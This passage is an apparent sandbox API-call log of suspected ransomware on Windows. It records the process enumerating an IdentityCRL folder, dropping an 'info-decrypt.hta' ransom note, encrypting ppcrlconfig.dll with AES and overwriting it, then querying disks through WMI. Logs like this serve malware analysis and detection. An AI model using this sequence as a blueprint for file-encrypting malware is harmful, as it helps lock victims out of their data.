Viewer\\Views\\ApplicationViewsRootNode\\*", lpFindFileData=0x691f0b4 | out: lpFindFileData=0x691f0b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3235c810, ftCreationTime.dwHighDateTime=0x1d2fa9b, ftLastAccessTime.dwLowDateTime=0x3235c810, ftLastAccessTime.dwHighDateTime=0x1d2fa9b, ftLastWriteTime.dwLowDateTime=0x3235c810, ftLastWriteTime.dwHighDateTime=0x1d2fa9b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f310 [0193.105] FindNextFileW (in: hFindFile=0xb7f310, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3235c810, ftCreationTime.dwHighDateTime=0x1d2fa9b, ftLastAccessTime.dwLowDateTime=0x3235c810, ftLastAccessTime.dwHighDateTime=0x1d2fa9b, ftLastWriteTime.dwLowDateTime=0x3235c810, ftLastWriteTime.dwHighDateTime=0x1d2fa9b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0193.105] FindNextFileW (in: hFindFile=0xb7f310, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3235c810, ftCreationTime.dwHighDateTime=0x1d2fa9b, ftLastAccessTime.dwLowDateTime=0x3235c810, ftLastAccessTime.dwHighDateTime=0x1d2fa9b, ftLastWriteTime.dwLowDateTime=0x3235c810, ftLastWriteTime.dwHighDateTime=0x1d2fa9b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0193.105] FindClose (in: hFindFile=0xb7f310 | out: hFindFile=0xb7f310) returned 1 [0193.105] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f34c) returned 1 [0193.105] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f358) returned 1 [0193.105] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f42c) returned 1 [0193.105] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\IdentityCRL", nBufferLength=0x105, lpBuffer=0x691ef34, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\IdentityCRL", lpFilePart=0x0) returned 0x24 [0193.105] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\IdentityCRL\\", nBufferLength=0x105, lpBuffer=0x691ef08, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\IdentityCRL\\", lpFilePart=0x0) returned 0x25 [0193.105] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\IdentityCRL\\*", lpFindFileData=0x691f154 | out: lpFindFileData=0x691f154*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd9b5b52, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f310 [0193.105] FindNextFileW (in: hFindFile=0xb7f310, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd9b5b52, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0193.106] FindNextFileW (in: hFindFile=0xb7f310, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd591378b, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xd591378b, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x6ac29de1, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x3d00, dwReserved0=0x0, dwReserved1=0x0, cFileName="ppcrlconfig.dll", cAlternateFileName="PPCRLC~1.DLL")) returned 1 [0193.106] FindNextFileW (in: hFindFile=0xb7f310, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd582ef5d, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xd582ef5d, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x6ac4ff3f, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x3e108, dwReserved0=0x0, dwReserved1=0x0, cFileName="ppcrlui.dll", cAlternateFileName="")) returned 1 [0193.106] FindNextFileW (in: hFindFile=0xb7f310, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0193.106] FindClose (in: hFindFile=0xb7f310 | out: hFindFile=0xb7f310) returned 1 [0193.106] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3ec) returned 1 [0193.106] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3f8) returned 1 [0193.106] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f42c) returned 1 [0193.106] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\IdentityCRL", nBufferLength=0x105, lpBuffer=0x691ef34, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\IdentityCRL", lpFilePart=0x0) returned 0x24 [0193.106] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\IdentityCRL\\", nBufferLength=0x105, lpBuffer=0x691ef08, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\IdentityCRL\\", lpFilePart=0x0) returned 0x25 [0193.106] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\IdentityCRL\\*", lpFindFileData=0x691f154 | out: lpFindFileData=0x691f154*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd9b5b52, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f310 [0193.107] FindNextFileW (in: hFindFile=0xb7f310, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd9b5b52, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0193.107] FindNextFileW (in: hFindFile=0xb7f310, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd591378b, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xd591378b, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x6ac29de1, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x3d00, dwReserved0=0x0, dwReserved1=0x0, cFileName="ppcrlconfig.dll", cAlternateFileName="PPCRLC~1.DLL")) returned 1 [0193.107] FindNextFileW (in: hFindFile=0xb7f310, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd582ef5d, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xd582ef5d, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x6ac4ff3f, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x3e108, dwReserved0=0x0, dwReserved1=0x0, cFileName="ppcrlui.dll", cAlternateFileName="")) returned 1 [0193.107] FindNextFileW (in: hFindFile=0xb7f310, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd582ef5d, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xd582ef5d, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x6ac4ff3f, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x3e108, dwReserved0=0x0, dwReserved1=0x0, cFileName="ppcrlui.dll", cAlternateFileName="")) returned 0 [0193.107] FindClose (in: hFindFile=0xb7f310 | out: hFindFile=0xb7f310) returned 1 [0193.107] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3ec) returned 1 [0193.107] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3f8) returned 1 [0193.107] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlconfig.dll", nBufferLength=0x105, lpBuffer=0x691eea0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlconfig.dll", lpFilePart=0x0) returned 0x34 [0193.107] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\IdentityCRL\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x691eea8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\IdentityCRL\\info-decrypt.hta", lpFilePart=0x0) returned 0x35 [0193.107] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f308) returned 1 [0193.107] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Microsoft\\IdentityCRL\\info-decrypt.hta" (normalized: "c:\\programdata\\microsoft\\identitycrl\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x691f384 | out: lpFileInformation=0x691f384*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0193.108] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f304) returned 1 [0193.108] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlconfig.dll", nBufferLength=0x105, lpBuffer=0x691eea0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlconfig.dll", lpFilePart=0x0) returned 0x34 [0193.108] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\IdentityCRL\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x691ed48, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\IdentityCRL\\info-decrypt.hta", lpFilePart=0x0) returned 0x35 [0193.108] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f23c) returned 1 [0193.108] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\IdentityCRL\\info-decrypt.hta" (normalized: "c:\\programdata\\microsoft\\identitycrl\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x598 [0193.110] GetFileType (hFile=0x598) returned 0x1 [0193.111] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f238) returned 1 [0193.111] GetFileType (hFile=0x598) returned 0x1 [0193.111] WriteFile (in: hFile=0x598, lpBuffer=0x36d676c*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x691f300, lpOverlapped=0x0 | out: lpBuffer=0x36d676c*, lpNumberOfBytesWritten=0x691f300*=0x1000, lpOverlapped=0x0) returned 1 [0193.112] WriteFile (in: hFile=0x598, lpBuffer=0x36d676c*, nNumberOfBytesToWrite=0x55e, lpNumberOfBytesWritten=0x691f2d4, lpOverlapped=0x0 | out: lpBuffer=0x36d676c*, lpNumberOfBytesWritten=0x691f2d4*=0x55e, lpOverlapped=0x0) returned 1 [0193.112] CloseHandle (hObject=0x598) returned 1 [0193.112] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlconfig.dll", nBufferLength=0x105, lpBuffer=0x691eea8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlconfig.dll", lpFilePart=0x0) returned 0x34 [0193.112] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f354) returned 1 [0193.112] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlconfig.dll" (normalized: "c:\\programdata\\microsoft\\identitycrl\\ppcrlconfig.dll"), fInfoLevelId=0x0, lpFileInformation=0x36d7788 | out: lpFileInformation=0x36d7788*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd591378b, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xd591378b, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x6ac29de1, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x3d00)) returned 1 [0193.112] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f350) returned 1 [0193.113] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlconfig.dll", nBufferLength=0x105, lpBuffer=0x691ed94, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlconfig.dll", lpFilePart=0x0) returned 0x34 [0193.113] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f288) returned 1 [0193.113] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlconfig.dll" (normalized: "c:\\programdata\\microsoft\\identitycrl\\ppcrlconfig.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x598 [0193.113] GetFileType (hFile=0x598) returned 0x1 [0193.113] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f284) returned 1 [0193.113] GetFileType (hFile=0x598) returned 0x1 [0193.113] GetFileSize (in: hFile=0x598, lpFileSizeHigh=0x691f390 | out: lpFileSizeHigh=0x691f390*=0x0) returned 0x3d00 [0193.113] ReadFile (in: hFile=0x598, lpBuffer=0x36d7960, nNumberOfBytesToRead=0x3d00, lpNumberOfBytesRead=0x691f33c, lpOverlapped=0x0 | out: lpBuffer=0x36d7960*, lpNumberOfBytesRead=0x691f33c*=0x3d00, lpOverlapped=0x0) returned 1 [0193.161] CloseHandle (hObject=0x598) returned 1 [0193.161] CryptAcquireContextW (in: phProv=0x691f2dc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x691f2dc*=0x66bafc0) returned 1 [0193.162] CryptGenRandom (in: hProv=0x66bafc0, dwLen=0x10, pbBuffer=0x36db9b4 | out: pbBuffer=0x36db9b4) returned 1 [0194.056] CryptImportKey (in: hProv=0x66bafc0, pbData=0x38fe6b0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x691f2ac | out: phKey=0x691f2ac*=0xb7f010) returned 1 [0194.056] CryptContextAddRef (hProv=0x66bafc0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0194.056] CryptContextAddRef (hProv=0x66bafc0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0194.057] CryptDuplicateKey (in: hKey=0xb7f010, pdwReserved=0x0, dwFlags=0x0, phKey=0x691f29c | out: phKey=0x691f29c*=0xb7f810) returned 1 [0194.057] CryptContextAddRef (hProv=0x66bafc0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0194.057] CryptSetKeyParam (hKey=0xb7f810, dwParam=0x4, pbData=0x38fe790*=0x1, dwFlags=0x0) returned 1 [0194.057] CryptSetKeyParam (hKey=0xb7f810, dwParam=0x1, pbData=0x38fe75c, dwFlags=0x0) returned 1 [0194.057] CryptEncrypt (in: hKey=0xb7f810, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x38fe7a0*, pdwDataLen=0x691f308*=0x3d10, dwBufLen=0x3d10 | out: pbData=0x38fe7a0*, pdwDataLen=0x691f308*=0x3d10) returned 1 [0194.057] CryptEncrypt (in: hKey=0xb7f810, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x39024d4*, pdwDataLen=0x691f310*=0x0, dwBufLen=0x10 | out: pbData=0x39024d4*, pdwDataLen=0x691f310*=0x10) returned 1 [0194.058] CryptDestroyKey (hKey=0xb7f010) returned 1 [0194.058] CryptReleaseContext (hProv=0x66bafc0, dwFlags=0x0) returned 1 [0194.058] CryptReleaseContext (hProv=0x66bafc0, dwFlags=0x0) returned 1 [0194.058] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlconfig.dll", nBufferLength=0x105, lpBuffer=0x691ed80, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlconfig.dll", lpFilePart=0x0) returned 0x34 [0194.058] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f274) returned 1 [0194.058] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlconfig.dll" (normalized: "c:\\programdata\\microsoft\\identitycrl\\ppcrlconfig.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x59c [0194.059] GetFileType (hFile=0x59c) returned 0x1 [0194.059] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f270) returned 1 [0194.059] GetFileType (hFile=0x59c) returned 0x1 [0194.059] WriteFile (in: hFile=0x59c, lpBuffer=0x3902adc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x691f304, lpOverlapped=0x0 | out: lpBuffer=0x3902adc*, lpNumberOfBytesWritten=0x691f304*=0x20, lpOverlapped=0x0) returned 1 [0194.060] CloseHandle (hObject=0x59c) returned 1 [0194.060] CoTaskMemAlloc (cb=0x20c) returned 0xbed438 [0194.060] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbed438 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0194.060] CoTaskMemFree (pv=0xbed438) [0194.060] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x691ed68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0194.060] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x691f2b0 | out: ppv=0x691f2b0*=0xb51e34) returned 0x0 [0194.098] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x691f2a8 | out: pAptType=0x691f2a8*=1) returned 0x0 [0194.098] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x691f2ac | out: ppvObject=0x691f2ac*=0x0) returned 0x80004002 [0194.098] IUnknown:Release (This=0xb51e34) returned 0x1 [0194.099] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x691ec18 | out: ppv=0x691ec18*=0x6027680) returned 0x0 [0194.100] WbemDefPath:IUnknown:QueryInterface (in: This=0x6027680, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x691ee30 | out: ppvObject=0x691ee30*=0x0) returned 0x80004002 [0194.100] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6027680, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691ee44 | out: ppvObject=0x691ee44*=0x6030860) returned 0x0 [0194.100] WbemDefPath:IUnknown:Release (This=0x6027680) returned 0x0 [0194.100] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030860, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691ea64 | out: ppvObject=0x691ea64*=0x6030860) returned 0x0 [0194.100] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030860, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x691ea20 | out: ppvObject=0x691ea20*=0x0) returned 0x80004002 [0194.100] WbemDefPath:IUnknown:AddRef (This=0x6030860) returned 0x3 [0194.100] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030860, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x691e37c | out: ppvObject=0x691e37c*=0x0) returned 0x80004002 [0194.100] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030860, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x691e32c | out: ppvObject=0x691e32c*=0x0) returned 0x80004002 [0194.100] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030860, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691e338 | out: ppvObject=0x691e338*=0x66ccaf8) returned 0x0 [0194.100] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x66ccaf8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x691e340 | out: pCid=0x691e340*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0194.100] WbemDefPath:IUnknown:Release (This=0x66ccaf8) returned 0x3 [0194.100] CoGetContextToken (in: pToken=0x691e398 | out: pToken=0x691e398) returned 0x0 [0194.101] CoGetContextToken (in: pToken=0x691e7a0 | out: pToken=0x691e7a0) returned 0x0 [0194.101] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030860, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691e830 | out: ppvObject=0x691e830*=0x0) returned 0x80004002 [0194.101] WbemDefPath:IUnknown:Release (This=0x6030860) returned 0x2 [0194.101] WbemDefPath:IUnknown:Release (This=0x6030860) returned 0x1 [0194.101] CoGetContextToken (in: pToken=0x691f128 | out: pToken=0x691f128) returned 0x0 [0194.101] CoGetContextToken (in: pToken=0x691f088 | out: pToken=0x691f088) returned 0x0 [0194.101] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030860, riid=0x691f158*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x691f154 | out: ppvObject=0x691f154*=0x6030860) returned 0x0 [0194.101] WbemDefPath:IUnknown:AddRef (This=0x6030860) returned 0x3 [0194.101] WbemDefPath:IUnknown:Release (This=0x6030860) returned 0x2 [0194.101] WbemDefPath:IWbemPath:SetText (This=0x6030860, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0194.101] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030860, puCount=0x691f2dc | out: puCount=0x691f2dc*=0x0) returned 0x0 [0194.101] WbemDefPath:IWbemPath:GetText (in: This=0x6030860, lFlags=2, puBuffLength=0x691f2d8*=0x0, pszText=0x0 | out: puBuffLength=0x691f2d8*=0x20, pszText=0x0) returned 0x0 [0194.101] WbemDefPath:IWbemPath:GetText (in: This=0x6030860, lFlags=2, puBuffLength=0x691f2d8*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x691f2d8*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0194.101] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030860, uRequestedInfo=0x0, puResponse=0x691f2e4 | out: puResponse=0x691f2e4*=0xc19) returned 0x0 [0194.101] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030860, puCount=0x691f2dc | out: puCount=0x691f2dc*=0x0) returned 0x0 [0194.101] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030860, uRequestedInfo=0x0, puResponse=0x691f2e4 | out: puResponse=0x691f2e4*=0xc19) returned 0x0 [0194.101] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030860, uRequestedInfo=0x0, puResponse=0x691f2e4 | out: puResponse=0x691f2e4*=0xc19) returned 0x0 [0194.101] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030860, puCount=0x691f25c | out: puCount=0x691f25c*=0x0) returned 0x0 [0194.101] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x691f248 | out: puCount=0x691f248*=0x2) returned 0x0 [0194.101] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x691f244*=0x0, pszText=0x0 | out: puBuffLength=0x691f244*=0xf, pszText=0x0) returned 0x0 [0194.102] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x691f244*=0xf, pszText="00000000000000" | out: puBuffLength=0x691f244*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0194.102] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x691f1f8 | out: ppv=0x691f1f8*=0xb51e34) returned 0x0 [0194.102] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, 